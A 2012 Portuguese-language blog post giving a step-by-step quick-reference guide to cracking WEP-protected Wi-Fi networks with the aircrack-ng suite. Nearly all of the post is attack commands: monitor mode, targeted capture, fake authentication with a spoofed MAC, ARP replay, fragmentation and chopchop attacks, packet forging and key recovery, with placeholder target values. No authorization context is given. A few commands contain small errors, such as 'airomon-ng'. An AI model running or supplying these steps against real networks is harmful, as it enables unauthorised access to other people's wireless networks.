Dead Packets

09/10/2012

Wireless Fun – Crackeando WEP

Filed under: segurança,wireless — drak @ 10:58 PM

Todo mundo sabe, todo mundo já fez mas como nunca achei um guia de referência rápido, segue abaixo o que fazer para conseguir crackear uma rede Wi-Fi que está utilizando criptografia WEP (e se a sua ainda estiver assim, troque agora!)

O objetivo desse post é ser um guia rápido, caso você não entenda o que está fazendo sugiro que leia as referências.

Variáveis utilizadas

Interface = <INTERFACE>
Rede = <REDE_ALVO>
BSSID = <00:AA:BB:CC:DD:FF>
MAC SUA PLACA DE REDE = <11:22:33:44:55:66>
Arquivo de captura = <FILENAME_CAPTURA>

Crackear WEP – Etapas comuns

Inicie a interface em modo monitor

airomon-ng start <INTERFACE>

Inicie o airodump-ng para verificar o que tem por perto

airodump-ng mon0

Escolha a rede alvo e faça os filtros adequados pela criptografia, SSID e canal no airodump

airodump-ng --encrypt WEP --bssid <00:AA:BB:CC:DD:FF> --channel 1 --write <FILENAME_CAPTURA> mon0

Crackear WEP – Com clientes ativos na rede

Teste que você consegue injetar pacotes e use o aireplay para gerar tráfego

<!-- Teste de injeção -->
aireplay-ng --test mon0
<!-- Associação com o AP -->
aireplay-ng --fakeauth 0 -a <00:AA:BB:CC:DD:FF> -e <REDE_ALVO> mon0
<!-- Associação usando um MAC diferente da sua placa de rede wireless -->
aireplay-ng --fakeauth 0 -h <11:22:33:44:55:66> -a <00:AA:BB:CC:DD:FF> -e  mon0
<!-- Geração do tráfego, deve estar associado -->
aireplay-ng --arpreplay -b <00:AA:BB:CC:DD:FF> mon0

Inicie o aircrack-ng para a análise dos pacotes capturados

aircrack-ng -e <REDE_ALVO> -b <00:AA:BB:CC:DD:FF> <FILENAME_CAPTURA>.cap

Crackear WEP – Sem clientes

<!-- Associar -->
aireplay-ng --fakeauth 0 -a <00:AA:BB:CC:DD:FF> -e <REDE_ALVO> mon0

Obter o PRGA usando fragmentação ou chopchop

aireplay-ng --fragment -b <00:AA:BB:CC:DD:FF> mon0
aireplay-ng --chopchop -b <00:AA:BB:CC:DD:FF> mon0

Gere um ARP request com o PRGA obtido anteriormente

packetforge-ng --arp -a <00:AA:BB:CC:DD:FF> -k 255.255.255.255 -l 255.255.255.255 -y fragment-dddd-nnnnnn.xor -h <11:22:33:44:55:66> -w fake_arp_request.cap

Com o pacote gerado, faça o replay dele

aireplay-ng --interactive -r fake_arp_request.cap mon0

Ou, ao invés disso tudo acima, simplesmente:

aireplay-ng --interactive -p 0841 -c FF:FF:FF:FF:FF:FF -b <00:AA:BB:CC:DD:FF> mon0

Inicie o aircrack-ng para a análise dos pacotes capturados

aircrack-ng -e <REDE_ALVO> -b <00:AA:BB:CC:DD:FF> <FILENAME_CAPTURA>.cap

Update 11/11: Corrigi a sintaxe de alguns comandos

Referências
aircrack-ng: How to crack WEP with no clients

Anúncios

Deixe um comentário »

Nenhum comentário ainda.

RSS feed for comments on this post. TrackBack URI

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s

Crie um website ou blog gratuito no WordPress.com.

%d blogueiros gostam disto: